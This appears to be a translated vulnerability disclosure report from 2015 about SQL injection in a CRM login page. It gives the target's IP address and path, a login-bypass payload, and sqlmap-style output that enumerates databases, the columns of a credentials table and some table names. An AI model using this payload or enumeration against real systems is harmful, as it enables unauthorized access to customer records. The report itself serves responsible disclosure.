2015-11-10: Details sent to the vendor, awaiting vendor handling
2015-11-11: Vendor has confirmed; details disclosed to the vendor only
2015-11-21: Details disclosed to core white hats and relevant domain experts
2015-12-01: Details disclosed to regular white hats
2015-12-11: Details disclosed to intern white hats
2015-12-26: Details disclosed to the public
The problem is this serious and your company is this big, so hand out a reward!
Forgot to include the address in the first submission, annoying~
http://180.168.26.117:8000/8crm/login.php?msg=1
admin'or'1'='1admin'or'1'='1
Handled like this, your customers are all going to walk away.
web server operating system: Windows
web application technology: PHP 5.2.13, Apache 2.2.4
back-end DBMS: MySQL 5.0.12
[03:20:54] [INFO] fetching database names
[03:20:54] [INFO] fetching number of databases
[03:20:54] [INFO] resumed: 3
[03:20:54] [INFO] resumed: information_schema
[03:20:54] [INFO] resumed: crm_db
[03:20:54] [INFO] resumed: mysql
available databases [3]:
[*] crm_db
[*] information_schema
[*] mysql
Database: crm_db
Table: kis_login
[3 columns]
+------------+--------------+
| Column     | Type         |
+------------+--------------+
| login_pwd  | varchar(200) |
| login_uid  | varchar(32)  |
| login_uuid | varchar(50)  |
+------------+--------------+
[03:30:38] [INFO] fetching current database
[03:30:38] [INFO] resumed: crm_db
[03:30:38] [INFO] fetching tables for database: 'crm_db'
[03:30:38] [INFO] fetching number of tables for database 'crm_db'
[03:30:38] [INFO] resumed: 193
[03:30:38] [INFO] resumed: kis_data
[03:30:38] [INFO] resumed: kis_login
[03:30:38] [INFO] resumed: kis_syn
[03:30:38] [INFO] resumed: sms2
[03:30:38] [INFO] resumed: tab_account_client
[03:30:38] [INFO] resumed: tab_account_store
[03:30:38] [INFO] resumed: tab_action
[03:30:38] [INFO] resumed: tab_action_emp
[03:30:38] [INFO] resumed: tab_action_histroy
[03:30:38] [INFO] resumed: tab_actionhistroy_emp
[03:30:38] [INFO] resumed: tab_activity_attend
[03:30:38] [INFO] resumed: tab_activity_doc
[03:30:38] [INFO] resumed: tab_activity_enroll
[03:30:38] [INFO] resumed: tab_activity_linit
Too long; 193 tables in total, impressive~~ Not testing any further; if this customer information leaked out, the harm would be huge!
Only with a reward is there motivation!
Severity: High
Vulnerability Rank: 15
Confirmed at: 2015-11-11 10:14
Thanks for the submission, we will handle it right away
None yet